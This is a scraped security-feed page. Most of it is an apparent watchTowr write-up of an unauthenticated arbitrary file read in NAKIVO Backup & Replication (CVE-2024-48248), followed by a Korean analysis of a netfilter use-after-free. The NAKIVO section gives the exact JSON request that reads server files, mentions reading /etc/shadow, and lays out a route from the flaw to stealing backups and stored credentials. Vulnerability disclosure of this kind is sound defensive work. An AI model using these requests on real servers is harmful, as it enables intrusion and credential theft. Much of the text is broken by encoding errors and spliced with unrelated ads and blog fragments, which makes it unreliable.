Streamlining vulnerability research with IDA Pro and Rust
โRebels on the rise, we have [โฆ]
The post Streamlining vulnerability research with IDA Pro and Rust appeared first on hn security.
โRebels on the rise, we have [โฆ]
The post Streamlining vulnerability research with IDA Pro and Rust appeared first on hn security.
Intro In our previous article Fault [โฆ]
The post Fault Injection โ Looking for a Unicorn appeared first on hn security.
The fifth article (57 pages) of the Exploiting Reversing Series (ERS), a step-by-step research series on Windows, macOS, hypervisors and browsers, is available for reading on:
(PDF): https://exploitreversing.com/wp-content/uploads/2025/03/exploit_reversing_05.pdf
I would like to thank Ilfak Guilfanov (@ilfak on X) and Hex-Rays SA (@HexRaysSA on X) for their constant and uninterrupted support, which have helped me write these articles over time.
The best thing in life is people.
I hope you enjoy reading it and have an excellent day.
Alexandre Borges.
(MARCH/12/2025)
As an industry, we believe that weโve come to a common consensus after 25 years of circular debates - disclosure is terrible, information is actually dangerous, itโs best that itโs not shared, and the only way to really to ensure that no one ever uses information in a way that you donโt like (this part is key) is to make up terms for your way of doing things.
We have actively petitioned vendors to be more transparent, and weโre currently investing a lot of R&D time in the development of the best, thickest and tastiest crayons to sign a pledge (the name of which we haven't decided yet). We're thinking something like, Responsible Development Practices. We've also invested in a camera.
Anyway, that was, of course, just a random tangent before we began.
Today, weโre here to talk about an unauthenticated Arbitrary File Read vulnerability we discovered in NAKIVO's Backup and Replication solution - specifically in version 10.11.3.86570
(We didnโt check prior versions, and weโve struggled to get further information - more on this later).
In recent times, backup solutions have become targets for a plethora of marketing terms focused around ransomwareโlogically, because one popular way to help recover from a successful ransomware attack is to have a robust and reliable backup solution in place.
As weโve seen in numerous incidents, though, ransomware gangs tend to prefer situations in which they get paid and typically go that extra mile you'd expect from a 10x operator to ensure their victims canโt simply roll their systems back, including nuking and destroying any in-place backup mechanisms.
To prove our point, we can look at Veeam - one of the bigger players in the backup and recovery space. For whatever unknown reason, Veeam solutions have been a staple within CISAโs Known Exploited Vulnerability list - demonstrating even tenuously that attackers do see value in the targeting of backup solutions.
Beyond being a backup solution in the most simplistic and logical sense, NAKIVO Backup and Replication, like any modern backup solution, boasts endless integrations - itโll integrate into your hypervisors, your cloud environments, and more.
All these integrations are nice, but from an attackerโs point of view, this represents an opportunityโto access these solutions, NAKIVO is typically configured with credentials that allow access to the aforementioned environments (you can see where this is going).
An interesting and natural APT target, and thus we decided to take a look.
As a preface and some context, the NAKIVO Backup & Replication solution is made up of a number of components.
However, today our focus will be Director - a central management HTTP interface that listens on 4443/TCP (we didnโt bother going further, to be honest).
After deploying the Windows instance of this solution, we quickly got to work building a picture of how this system worked - handily supported by installation files deployed to: %ProgramFiles%\NAKIVO Backup & Replication
A quick glance shows us a Tomcat folder and a bunch of jar
files - fantastic news.
As always, our first aim is to understand what weโre looking at, and map functionality so that we can ultimately begin to understand where we should begin prodding. As with Tomcat applications deployed via war
files, the web.xml
defines the routes available to the application and the corresponding servlet that supports requests to defined endpoints.
For example, within this file:
<servlet>
<servlet-name>dispatcher</servlet-name>
<servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>dispatcher</servlet-name>
<url-pattern>/c/*</url-pattern>
</servlet-mapping>
In the above example, we can see that any value that follows on from the /c/
URI is mapped to the Spring Framework class org.springframework.web.servlet.DispatcherServlet
.
This is typically driven by its accompanying dispatcher servlet configuration file, which contains directives on how the servlet behaves.
For example, within this file (dispatcher-servlet.xml
), we find the tag <context:annotation-config/>
, which enables support for annotated controllers (@Controller
or @RestController
) and handler methods (@RequestMapping
, @GetMapping
, etc.) for jar files loaded within the classpath.
Looking outside the Tomcat folder, we find a large jar
file named backup_replication.jar
which contains usage of these annotations.
For example, we found the following annotation within com/company/product/ui/actions/LoginController.java
, as can be seen below the RequestMapping
maps to the URI /login
.
Controller
@RequestMapping({"/login"})
public class LoginController
extends AbstractController
{
@Autowired
@Qualifier("SettingsService")
private SettingsService settingsService;
@Autowired
private RegistrationService registrationService;
@Autowired
private ConfigurationInfoService configurationInfoService;
@Autowired
private WebApplicationContext applicationContext;
private static final Gson gson = SerializationUtils.createGsonSerializer().create();
@RequestMapping(method = {RequestMethod.GET})
public ModelAndView getIndex(Locale locale, HttpServletResponse response, HttpServletRequest request) {
CanTryResponse canTryResponse;
CanUseDefaultCredentialsResponse defaultCredentialsResponse;
addSecurityHeaders(response::addHeader);
By combining the prefix of the url-pattern
in the web.xml
with the RequestMapping
above we arrive at a URI of /c/login
to reach the login page. Fairly simply.
However, grabbing out the assorted controllers, we were disappointed to identify that only a small number were reachable without authentication, due to a filter being in place. Since we authenticated vulnerabilities typically arenโt our focus, weโre restricted to the following paths:
One endpoint stood out - /c/router
.
When initially browsing through the Director interface, this endpoint was heavily utilised to call various actions and methods.
Millions of years of evolution gave us a hint that this may be an interesting place to start - and so began to review HTTP requests like the following in more depth:
POST /c/router HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Connection: keep-alive
Content-Length: 98
{"action":"AutoUpdateManagement","method":"getState","data":null,"type":"rpc","tid":3980,"sid":""}
Seeing a request like this piques our interest (and weโre sure yours) because of the typically sensitive meaning of the words action
and method
.
In a vein to figure out at a high level how the solution works, we began to build a suspicion that action is literally mapped to Java classes, and method is literally mapped to methods in a class file.
Just grep
โing through the code, this begins to be confirmed:
@Service
@RemotingApiAction(AutoUpdateManagement.class)
public class AutoUpdateFacade
implements AutoUpdateManagement
{
@Autowired
private AutoUpdateService autoUpdateService;
@Autowired
@Qualifier("AlerterAutoUpdate")
private Alerter alerter;
@Autowired
private LicensingService licensingService;
@Autowired
private AuthenticationService authenticationService;
[..Truncated..]
@RemotingApiMethod(isMasterTenantAllowed = true, isTenantAllowed = false)
@Secured({"PERMISSION_VIEW_PRODUCT_AUTO_UPDATE"})
public boolean checkUpdateByServer() throws AutoUpdateManagementException {
return this.autoUpdateService.isCheckUpdateByServerFailed();
}
@RemotingApiMethod(isMasterTenantAllowed = true)
public AutoUpdateStateDto getState() {
AutoUpdateState state = this.autoUpdateService.getState()
As we can see, RemotingApiAction
(whatever this is) is passed something that looks suspiciously similar to our action
parameter value AutoUpdateManager
and the RemotingApiMethod
annotation maps to the method getState
.
Pulling ourselves back a little, weโve never seen the annotation @RemotingApiAction
before. Rather rapidly, we decided that this was a custom implementation specific to this NAKIVO solution, and low and behold we found it defined within com.company.product.direct.server.rpc.annotations.RemotingApiAction
, with the associated methods within com.company.product.direct.server.rpc.annotations.RemotingApiMethod
.
It doesnโt take a genius to confirm that the annotation, @RemotingApiAction
, maps to the action
parameter and the @RemotingApiMethod
to the method
parameter.
Now that weโre beginning to piece things together, a very rapid sift through the code reveals over a thousand occurrences of @RemotingApiMethod
being utilised, which gives us a fairly large amount of code to review. Weโre lazyโweโre not a PSIRT teamโ we just want the unauthenticated methods.
If you read the code snippet above again, like us youโll notice the @Secured
annotation for the checkUpdateByServer
method. This appears to be the mechanism in which the NAKIVO solution defines the roles and permissions needed to access a specific function - in this instance, @Secured({"PERMISSION_VIEW_PRODUCT_AUTO_UPDATE"})
.
So, we went back to our rapid sift, and effectively excluded anything that was accompanied by any @Secured
annotation.
For example, the following snippet was not accompanied by a @Secured
annotation:
@Service
@RemotingApiAction(VmAgentDiscoveryManagement.class)
public class VmAgentDiscoveryFacade
implements VmAgentDiscoveryManagement
{
[..Truncated..]
@RemotingApiMethod(isMasterTenantAllowed = true)
@Transactional(readOnly = true)
public TransporterHostDto getVmAgentByVmId(String id) throws VmAgentDiscoveryException {
try {
ValidationUtils.assertNotNull(id, "common.error.empty.value", new Object[] { "id" });
TransporterHost th = this.transporterService.getByVmVid(id);
th = (TransporterHost)this.gr.reattach((Identifiable)th);
return (th != null) ? this.transporterDtoHelperService.toDto(th) : null;
} catch (Exception e) {
throw new VmAgentDiscoveryException(e);
}
}
We can reach this, without authentication, with the following request to /c/router
:
POST /c/router HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Connection: keep-alive
Content-Length: 121
{"action":"VmAgentDiscoveryManagement","method":"getVmAgentByVmId","data":["watchTowr"],"type":"rpc","tid":3980,"sid":""}
Note how we supply the action
of VmAgentDiscoveryManagement
and the method
of getVmAgentByVmId
.
There are all sorts of pre-authenticated actions and methods that take in magical DTOs, and, bluntly, to review these comprehensively weโd have to spend time building out valid data structures and requests - strong pass, and in our experience, this level of effort just isnโt needed.
So, we spent another five minutes looking for more endpoints, and found the following gem:
@Service
@RemotingApiAction(STPreLoadManagement.class)
public class STPreLoadFacade
implements STPreLoadManagement
{
[..Truncated..]
@RemotingApiMethod
public byte[] getImageByPath(String path) throws MspManagementException {
try {
return this.brandingService.getImageByPath(path);
} catch (Throwable t) {
throw new MspManagementException(t);
}
This method, which maps to the action STPreLoadManagement
, looks interesting - GetImageByPath
sounds mysterious and unclear as to what it might do.
Naturally, we follow the call trace into brandingService.getImageByPath
:
public byte[] getImageByPath(String path) throws IOException {
String newPath = path.replace("/c", "userdata");
File file = new File(newPath);
return FileUtils.readFileToByteArray(file);
}
It appears that the getImageByPath
method takes a parameter (path
) and immediately uses that path to read a file to a byte array (or, we assume so, by the once again ambiguous readFileToByteArray
).
Throwing caution into the wind, we just give it a shot:
POST /c/router HTTP/1.1
Host: {{Hostname}
Content-Type: application/json
Connection: keep-alive
Content-Length: 121
{"action":"STPreLoadManagement","method":"getImageByPath","data":["C:/windows/win.ini"],"type":"rpc","tid":3980,"sid":""}
And what do we get back?
HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Strict-Transport-Security: max-age=31536000; includeSubDomains
Cache-Control: max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 466
Keep-Alive: timeout=60
Connection: keep-alive
{"action":"STPreLoadManagement","method":"getImageByPath","tid":"3980","type":"rpc","message":null,"where":null,"cause":null,"data":[59,32,102,111,114,32,49,54,45,98,105,116,32,97,112,112,32,115,117,112,112,111,114,116,13,10,91,102,111,110,116,115,93,13,10,91,101,120,116,101,110,115,105,111,110,115,93,13,10,91,109,99,105,32,101,120,116,101,110,115,105,111,110,115,93,13,10,91,102,105,108,101,115,93,13,10,91,77,97,105,108,93,13,10,77,65,80,73,61,49,13,10]}
Thatโs an interesting-looking series of numbers.
Well, OK - that was a little simpler than expected. We have an unauthenticated Arbitrary File Read vulnerability - with the added benefit that (per what we saw, and our own default deployment) - the NAKIVO solution runs as a superuser regardless of platform (i.e. we can read anything, inc /etc/shadow
if Linux deployed, for example).
Not great, but it's not RCE.
Weโve found an unauthenticated Arbitrary File Read vulnerability, that simply put allows us now to read any file on the target host. But, what can we use this for?
Well, rubbing our collective 2 and a half braincells together, we think back to the actual purpose of this solution - to store backups.
Canโt we justโฆ request the backups themselves? Ultimately, they're likely to contain all the juicy info we're looking for.
Where would they be?
After playing around with the software and backing up a sacrificial Linux server, we found the raw backup file stored on disk, as: C:\NakivoBackup\18ff30f5-cfd6-4708-9220-5ec433075934\ead9e897-7ec7-4612-9855-aa86e364afda.raw
This somewhat complicates things - an attacker needs to somehow enumerate/guess/manifest the correct UUIDs before they can even attempt to read and exfiltrate a server backup.
Well, fortunately or unfortunately, these backup file paths are magically stored in cleartext within the logs of the NAKIVO solution, which are located at logs\\0\\backup.log
and logs\\0\\controller-physical.log
. An attacker can simply use our lovely Arbitrary File Read Vulnerability to review these logs, extract the paths to the raw backup files, and subsequently download the backups.
Well, we guessโฆ thereโs one minorโฆ ok โฆ major limitation - since the server reads the entire file into RAM before serving it to the friendly-requesting user via HTTP, the file has to fit into (virtual) memory. In 2025, a reality in which systems are provisioned with harddisks typically measured in hundreds-of-GBs, if not TBs, it seems unlikely that the host configured to run this NAKIVO solution will have sufficient amounts of ram.
In addition, we have to hope that a friendly network admin doesnโt notice hundreds of GBs of bandwidth leaving their environment.
Editor: Letโs be real, this is not going to be noticed.
With this fairly significant limitation in mind, and disappointed that we felt this vulnerability was becoming a little โimpact-lessโ, we pondered on how we could leverage this into something a little more scary.
We reflected that uninspired attack scenarios could include simply downloading the local database used by the solution, extracting and โcrackingโ user passwords, and logging in as a legitimate user - but this would reflect a lot of effort and as we mentioned earlier, weโre lazy. What if someone actually bothered to use strong passwords?
Surprisingly (not really), the solutionโs default database sits on the filesystem at userdata\db\product01.h2.db
.
If we recall back to what we mentioned earlier - the NAKIVO solution integrates into a multitude of system types, and when setting up the solution itself to create backups you do indeed have a multitude of options for adding various โInventoryโ items:
To connect to an AWS S3 bucket for the purposes of performing a backup, youโd logically need AWS keys.
To connect to a Linux host for the purposes of performing a backup, you would require SSH credentials (for example).
To connect to a Domain Controller for the purposes of performing a backup, you would need suitably privileged credentials.
In order for the solutions to work, these keys and credentials will need to be stored in a non-hashed manner for the integrations to take place with automation.
Having reviewed the database locally in a text editor, we identified that these keys and credentials are stored encrypted using a key located in: %ProgramFiles%\NAKIVO Backup & Replication\userdata\config.properties
This means it's not just a matter of dumping the DB and running a query.
While all the data is stored within the H2.db file, the schema is not stored there, making it impossible to simply open it in a client and select data with SQL statements. The NAKIVO solution stores the schema within the application code and formats the .db file at runtime. This leaves us with two options to proceed:
Letโs imagine the following, to move past this hurdle:
NAKIVO Backup & Replication Director
service on our host%ProgramFiles%\NAKIVO Backup & Replication\userdata\db\product01.h2.db
%ProgramFiles%\NAKIVO Backup & Replication\userdata\config.properties
At this point, we could configure backup jobs on our now locally deployed NAKIVO instance to connect to these inventory items (defined in our โborrowedโ database), but that in itself introduces operational hurdles (bandwidth, network connectivity requirements, etc).
Why canโt we just get the credentials, and use as we see fit?
In this example, where NAKIVO has been configured with an SSH username and password pair for this particular inventory item, the password is masked (no, itโs not a client-side mask). But, logically, our connection to the host is still success and thus somewhere - likely in memory - the configured credentials must exist in plaintext.
Given weโre now operating with a โborrowedโ database on our local NAKIVO solution, this is relatively simple to address - we can configure the NAKIVO solution to create a Java Debug session, allowing us to dump memory in full.
To dump this from memory we can create a Java Debug session by adding debug JVM parameters to:
%ProgramFiles%\NAKIVO Backup & Replication\native\win32\backup_replication-service.ini
First we connect our Java debugger with the backup_replication.jar
attached as a library, so we can correctly breakpoint the application server.
Secondly, using the NAKIVO's GUI, we attempt to edit the connection to the Ubuntu server without changing the username or starred password, a HTTP request is triggered for the action PhysicalDiscovery
and method update
.
Finding this within the library (com/company/product/hypervisors/physical/discovery/core/PhysicalDiscoveryService.class
) and setting a breakpoint allows us to dump the cleartext credential for the server:
And just like that, weโve demonstrated a clear path from our unauthenticated Arbitrary File Read vulnerability - to obtaining all stored credentials utilized by the target NAKIVO solution.
From here, the possibilities are extensive depending on what's been integrated, and goes beyond merely stealing backups โ to essentially unlocking entire infrastructure environments.
We attempted to disclose this vulnerability to NAKIVO several times via email (13th September 2024 and 2nd October 2024), but did not receive a response. After a month or so, we braved their chat system and engaged with a very confused representative who, somewhat expectedly, didnโt really understand our problem.
Fortunately, though, the confusion must have made itโs way a little further, as we later received an email from NAKIVO support (29th October 2024).
Living our lives peacefully and really not bothering anyone, we eventually identified that NAKIVO had quietly patched the vulnerability in a new release (without announcing the vulnerability via an advisory), and we confirmed that fixes are present in versions v11.0.0.88174
and onwards.
In the patched version, the developers have opted to utilize the FileUtils
library with the getFile
function.
By utilizing this approach the supplied value from the user is split into components and a new file path is constructed using fixed directory names ("userdata", "branding") combined with only the filename portion, preventing directory traversal attempts - parent directory references (../) and path manipulation are stripped away during the filename extraction process.
public byte[] getImageByPath(String path) throws IOException {
String fileName = FilenameUtils.getName(path);
File targetFile = FileUtils.getFile(new String[] { "userdata", "branding", fileName });
if (!targetFile.exists() || !targetFile.canRead() || targetFile.isDirectory()) {
throw new IOException(Lang.get("services.branding.no.file", new Object[0]));
}
return FileUtils.readFileToByteArray(targetFile);
}
This resolves the vulnerability we identified and detail here today.
However, much to our dismay, when reviewing release notes for the NAKIVO solution, there is no mention of this vulnerability (and of course, no CVE); we can only assume that they reached out to their customer base secretly to inform them to upgrade to v11.0.0.88174
to resolve this vulnerability.
We would be shocked if a vendor tried to sweep a vulnerability this serious under a rug, and knowingly give their customers a misplaced sense of security.
Regardless, we applied for a CVE number ourselves and were allocated CVE-2024-48248, so we can at least reference the vulnerability by this name.
Weโve said time and time again that bugs, in some form or another, are an inescapable fact of life, and that a vendors response to a bug is much more important than the presence of a defect itself.
Weโre not assuming or suggesting here that NAKIVO have responded badly - we of course assume that they contacted all their customers under NDA, and encouraged them quietly to patch, to avoid leaving their customers unknowingly vulnerable.
Regardless of this, weโre still in โnot greatโ territory - software that safeguards large amounts of critical data, as any backup solution does, is bound to be under the scrutiny of motivated and mean attackers. Given a vulnerability so โsimpleโ, itโs sometimes hard to believe that weโre the only ones that stumbled into it.
As we mentioned previously, we have confirmed that the aforementioned vulnerability has been resolved in v11.0.0.88174
.
Beyond this, we are unable to advise as to which versions, and how many versions, proceeding this are vulnerable, and can only advise that concerned customers of NAKIVO attempt exploitation of their servers in order to firmly ascertain their status.
To make this easier, weโve supplied a Detection Artifact Generator that also serves as an unofficial NAKIVO customer support tool:
https://github.com/watchtowrlabs/nakivo-arbitrary-file-read-poc-CVE-2024-48248/
Date | Detail |
---|---|
13th September 2024 | Vulnerability discovered |
13th September 2024 | Vulnerability disclosed to NAKIVO in version 10.11.3.86570 |
13th September 2024 | watchTowr hunts through client attack surfaces for impacted systems, and communicates with those affected |
2nd October 2024 | watchTowr follows up, as no response received from NAKIVO via Email |
18th October 2024 | watchTowr is assigned CVE-2024-48248 for this vulnerability |
29th October 2024 | NAKIVO acknowledges the vulnerability via Email |
4th November 2024 | NAKIVO silently patches the vulnerability (v11.0.0.88174) |
26th February 2025 | Blog post and unofficial NAKIVO customer support tool release |
Letโs talk about YAGC (Yet Another Gartnerยฎ Categoryโwe kid, we kid): CTEM. Truth is the cybersecurity space is overflowing with acronyms, frameworks, and categories, and, like vulnerability scanning, it can be hard to parse what matters amidst the noise. You need to know whether itโs worth your time, and if so, what youโll need to invest across tools, processes, and people to be successful.
For years, organizations have relied on human-led pentestsโbut these outdated methods are slow, expensive, and leave security gaps between tests. This white paper revealsโฆ
Taking on the role of a Chief Information Security Officer (CISO) comes with a sobering realization: the clock starts ticking the moment you step into the role. Cyber threats donโt wait, and your organizationโs vulnerabilities may already be known to adversaries. In this high-stakes environment, NodeZeroยฎ becomes more than a tool โ itโs your immediate ally. If I were a new CISOโฆ
Financial services faced 141 breaches in Q3 2024 alone, exposing over 16 million victims. Cybercriminals exploit hidden vulnerabilities that traditional tools often fail to detectโleaving organizations at risk. In just 14 hours, NodeZero uncovered critical weaknesses, multiple domain compromises, and systemic security gaps at a major financial institution. With quick remediationโฆ
Mergers and acquisitions introduce significant cybersecurity risks, from unknown vulnerabilities in the target companyโs IT infrastructure to latent threats that could persist post-acquisition. Traditional due diligence often overlooks these risks, leaving organizations exposed. NodeZeroยฎ provides a proactive, attack-driven approach to identifying and mitigating security gaps before, duringโฆ
2025 Top Rated Software Awardโฆ
Business Wire 02/25/2025 Horizon3.ai, a global leader of autonomous security solutions, continues to set new industry benchmarks, achieving 101% year-over-year revenue growth and exceeding 150% of Q4 pipeline targets in FY25. With demand accelerating for real-world, offense-driven security, organizations are rapidly adopting NodeZeroยฎ to continuously find, fix, and verify exploitable weaknessesโฆ
Business Wire 02/19/2025 Horizon3.ai, a global leader of autonomous security solutions, announced today that NodeZeroยฎ has surpassed 100,000 pentests conducted by over 3,000 customers, with projections exceeding 400,000 by the end of 2026. As cyber threats escalate, organizations are shifting from periodic, compliance-driven pentests to continuous attack validation with NodeZero.
Back in October of 2024, we were investigating one of the many Ivanti vulnerabilities and found ourselves without a patch to โpatch diffโ with โ leading us to audit the code base at mach speed. This led to the discovery of four critical vulnerabilities in Ivanti Endpoint Manager (EPM). These vulnerabilities were patched last month in Ivantiโs January patch rollup.
Adam Warren, IT Director at Jeromeโs Furniture, sits down with Horizon3.aiโs Principle Security SME, Stephen Gates, to discuss how Jeromeโs has evolved its cybersecurity strategy over the years. From early vulnerability management struggles to the adoption of autonomous penetration testing with NodeZero, Adam shares real-world insights on how a lean IT team can efficiently defend against modernโฆ
์ด ์ทจ์ฝ์ ์ Linux Kernal ๋ด ๋ฆฌ๋ ์ค ํจํท ํํฐ๋ง ๋ฐ ๋คํธ์ํฌ ์ฃผ์ ๋ณํ(NAT) ํ๋ ์์ํฌ์ธ netfilter์ nf_tables ๊ตฌ์ฑ ์์์์ UAF๊ฐ ๋ฐ์ํ๋ ์ทจ์ฝ์ ์ ๋๋ค.
์ด ์ทจ์ฝ์ ์ nftables์ ํจํท ์ฒ๋ฆฌ ๊ณผ์ ์์ ๋ฐ์ํ๋ฉฐ, nf_hook_slow()
์ nft_verdict_init()
ํจ์์์ ๋ฐ์ํฉ๋๋ค.
์๋๋ nf_hook_slow()
ํจ์์ ์ผ๋ถ์
๋๋ค.
int nf_hook_slow(struct sk_buff *skb, struct nf_hook_state *state, const struct nf_hook_entries *e, unsigned int s){ unsigned int verdict; int ret; for (; s < e->num_hook_entries; s++) { verdict = nf_hook_entry_hookfn(&e->hooks[s], skb, state); switch (verdict & NF_VERDICT_MASK) { case NF_ACCEPT: break; case NF_DROP: kfree_skb(skb); ret = NF_DROP_GETERR(verdict); if (ret != 0) // ์คํ ์์ ret = -EPERM; return ret; case NF_QUEUE: ret = nf_queue(skb, state, s, verdict); if (ret == 1) continue; return ret; default: break; } return 0; } return 1;}
์ ์ฝ๋๋ netfilter ๋ชจ๋ ๋ด์ nf_hook_slow()
ํจ์์ ์ผ๋ถ๋ก, ํจํท ์ฒ๋ฆฌ ๊ท์น์ ๋ฐ๋ณต๋ฌธ ์์์ ํ๊ฐํฉ๋๋ค. ํจํท์ ๋ํ verdict ๊ฐ์ ์ป๊ณ , ๊ทธ ๊ฐ๊ณผ NF_VERDICT_MASK ๋งคํฌ๋ก ๊ฐ์ ํตํด ํจํท ์ฒ๋ฆฌ๋ฅผ ๊ฒฐ์ ํฉ๋๋ค. verdict ๊ฐ์ ํจํท ์ฒ๋ฆฌ ๊ฒฐ๊ณผ๊ฐ์ ๋ํ๋ด๋ฉฐ, ์ด๋ ์ฌ์ฉ์๊ฐ ์ค์ ํ ์ ์๋ ๊ฐ์
๋๋ค.
nf_hook_slow()
ํจ์์์๋ NF_DROP์ผ ๊ฒฝ์ฐ kfree_skb()
๋ฅผ ํธ์ถํ์ฌ ํจํท์ ํด์ ํฉ๋๋ค. ์ดํ NF_DROP_GETERR(verdict)์์ ๊ณต๊ฒฉ์๊ฐ ์ค์ ํ verdict ๊ฐ์ด โ0xFFFF0000โ์ด๋ผ๋ฉด, ํจ์ ๋ด๋ถ ์ฐ์ฐ์ ํตํด ret ๊ฐ์ -65535๋ก ์ค์ ๋ฉ๋๋ค. ์ด ๊ฐ์ ์ดํ NF_ACCEPT๋ก ์ฒ๋ฆฌ๋์ด ํจํท์ด ๊ณ์ํด์ ์ฒ๋ฆฌ๋ฉ๋๋ค.
์๋๋ nft_verdict_init()
ํจ์์
๋๋ค.
static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data, struct nft_data_desc *desc, const struct_nlattr *nla){ switch (data->verdict.code) { default: switch (data->verdict.code & NF_VERDICT_MASK) { case NF_ACCEPT: case NF_DROP: case NF_QUEUE: break; default: return -EINVAL; } } return 0;}
nft_verdict_init()
ํจ์์์ data->verdict.code
๋ ๊ท์น ์ค์ ์ ๋ํ ๋ฆฌํด ๊ฐ์ผ๋ก ์ฌ์ฉ๋๋ฉฐ, ๊ณต๊ฒฉ์๊ฐ โ0xFFFF0000โ ๊ฐ์ ์ค์ ํ ๊ฒฝ์ฐ ์ทจ์ฝ์ ์ด ๋ฐ์ํฉ๋๋ค.
NF_VERDICT_MASK ๋งคํฌ๋ก๋ฅผ ํตํด verdict.code์ ํ์ 16๋นํธ๋ฅผ ์ถ์ถํ๋ฉด, โ0xFFFF0000 & 0x0000FFFFโ๊ฐ ๋์ด โ0x00000000โ์ด ๋ฉ๋๋ค. ์ด ๊ฐ์ NF_DROP์ ์๋ฏธํ๊ธฐ ๋๋ฌธ์ ํด๋น ํจํท์ ๋๋กญํ๋ ๊ฒ์ผ๋ก ์ฒ๋ฆฌ๋ฉ๋๋ค. ๊ทธ๋ฌ๋ nf_hook_slow()
ํจ์์์ ํจํท์ ๋๋กญํ๋ ค๋ ์ฒ๋ฆฌ ํ, NF_DROP_GETERR(verdict) ์ฐ์ฐ์ ์ํด ret ๊ฐ์ -65535๋ก ์ค์ ๋๋ฉฐ, NF_ACCEPT๋ก ์ฒ๋ฆฌ๋ฉ๋๋ค.
์ด๋ก ์ธํด ์ด๋ฏธ kfree_skb()
๋ก ํด์ ๋ ํจํท์ด ๋ค์ ์ฒ๋ฆฌ๋์ด ์ด์ ์ ํด์ ๋ ์์ผ ๋ฉ๋ชจ๋ฆฌ(skb)๋ฅผ ์ฐธ์กฐํ๊ฒ ๋์ด Use-After-Free(UAF) ์ํฉ์ด ๋ฐ์ํ๊ณ , ๊ทธ ํ ๋ค์ ์์ผ ๋ฉ๋ชจ๋ฆฌ๋ฅผ ํด์ ํ๋ฉด์ ์ด์ค ํด์ (double-free)๊ฐ ๋ฐ์ํ๊ฒ ๋ฉ๋๋ค.
ํจ์น๋ nft_verdict_init()
ํจ์๋ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
switch (data->verdict.code) { case NF_ACCEPT: case NF_DROP: case NF_QUEUE: break; case NFT_CONTINUE: case NFT BREAK: case NFT_RETURN: data->verdict.chain-chain; break; default: return -EINVAL; }
data->verdict.code
๊ฐ์ ๋ํด ๊ฒ์ฆ์ด ์ถ๊ฐ๋์์ต๋๋ค. ์ด์ verdict.code
๊ฐ์ ํ์ฉ๋ ๊ฐ๋ค๋ง ์ฒ๋ฆฌํ๊ณ , ์๋ชป๋ ๊ฐ์ด ๋ค์ด์ค๋ฉด ๋ฌด์กฐ๊ฑด -EINVAL
์ ๋ฐํํ์ฌ ์
์์ ์ธ ์
๋ ฅ์ ์ฐจ๋จํฉ๋๋ค. ์ด๋ก ์ธํด ํจํท ์ฒ๋ฆฌ๊ฐ ์ ์์ ์ผ๋ก ์ด๋ฃจ์ด์ง๋ฉฐ, ์ทจ์ฝ์ ์ ๋ฐฉ์งํ ์ ์์ต๋๋ค.
๊ฒฐ๋ก ์ ์ผ๋ก, ์ด ์ทจ์ฝ์ ์ nf_hook_slow()
์์ ํจํท์ ์ฒ๋ฆฌํ๊ณ , ์๋ชป๋ verdict ๊ฐ์ผ๋ก ์ธํด ์ด๋ฏธ ํด์ ๋ ๋ฉ๋ชจ๋ฆฌ๋ฅผ ์ฐธ์กฐํ๊ฒ ๋์ด Use-After-Free(UAF)์ ์ด์ค ํด์ (double-free) ๋ฌธ์ ๊ฐ ๋ฐ์ํ๋ ๊ฒ์
๋๋ค. ํจ์น๋ ๋ฒ์ ์์๋ verdict.code ๊ฐ์ ์ง์ ๊ฒ์ฆํ์ฌ ์ ํจํ์ง ์์ ๊ฐ์ ๋ํด ์ค๋ฅ๋ฅผ ๋ฐํํจ์ผ๋ก์จ ์ด ๋ฌธ์ ๋ฅผ ํด๊ฒฐํฉ๋๋ค.
์๋ ํ์ธ์ bekim์ ๋๋ค.
์ด์ ์ฐ๊ตฌ๊ธ์์๋ ๋นํธ์ฝ์ธ ๋คํธ์ํฌ์ ๋ธ๋ก์ ์ถ๊ฐํ์ฌ ๊ฑฐ๋๋ฅผ ๊ฐ๋ฅํ๊ฒ ํ๋ ๊ฒ์ด โProof of Workโ์์ ์งง๊ฒ ์๋ ค๋๋ ธ์ฃ ? ์ฌ์ค ์ด ๊ณผ์ ์ ๊ฐ๋ฅํ๊ฒ ํ๋ ํฉ์ ์๊ณ ๋ฆฌ์ฆ์ PoW ๋ฟ๋ง ์๋๋ผ ์ฌ๋ฌ ๊ฐ์ง๊ฐ ์์ด์. ํฉ์ ์๊ณ ๋ฆฌ์ฆ(Consensus Algorithm)์ด๋, ๋ธ๋ก์ฒด์ธ ๋คํธ์ํฌ์ ์ฐธ์ฌ์๋ค์ด ํ๋์ ์ ํจํ ๋ธ๋ก์ ์ ํํ๊ณ , ํด๋น ์ฒด์ธ์ ์ ์งํ๋ ๋ฐฉ์์ ๊ฒฐ์ ํ๋ ๋งค์ปค๋์ฆ์ ๋งํด์.
์ด๋ฒ ์ฐ๊ตฌ๊ธ์์๋ ๊ทธ ์ค์์๋ ์ ์๋ ค์ง ์๊ณ ๋ฆฌ์ฆ์ธ PoS, PoW์ DPoS, PBFT, Hybrid PoW/PoS์ ๋ํด ์ค๋ช
๋๋ฆฌ๊ฒ ์ต๋๋ค.
์ ๋ฒ์ ๋ง์๋๋ ธ๋ ์์
์ฆ๋ช
์ ๊ฐ๋จํ๊ฒ ์ค๋ช
๋๋ฆฌ๋ฉด, ์์
์ฆ๋ช
์ ์ฑ๊ตด์๊ฐ ์ฐ์ฐ์ ์ํํ์ฌ ํน์ ๋์ด๋๋ฅผ ๋ง์กฑํ๋ ํด์ ๊ฐ์ ์ฐพ๋ ๋ฐฉ์์
๋๋ค. ์ด ๋ฐฉ์์ ๋นํธ์ฝ์ธ์์ ์ฒ์ ๋์
๋์์ผ๋ฉฐ, ์ฑ๊ตด์๋ Nonce ๊ฐ์ ์กฐ์ ํ๋ฉฐ ๋ชฉํ ํด์ ๊ฐ์ ์ฐพ๋ ๊ณผ์ ์ ๋ฐ๋ณตํด์ผ ํด์.
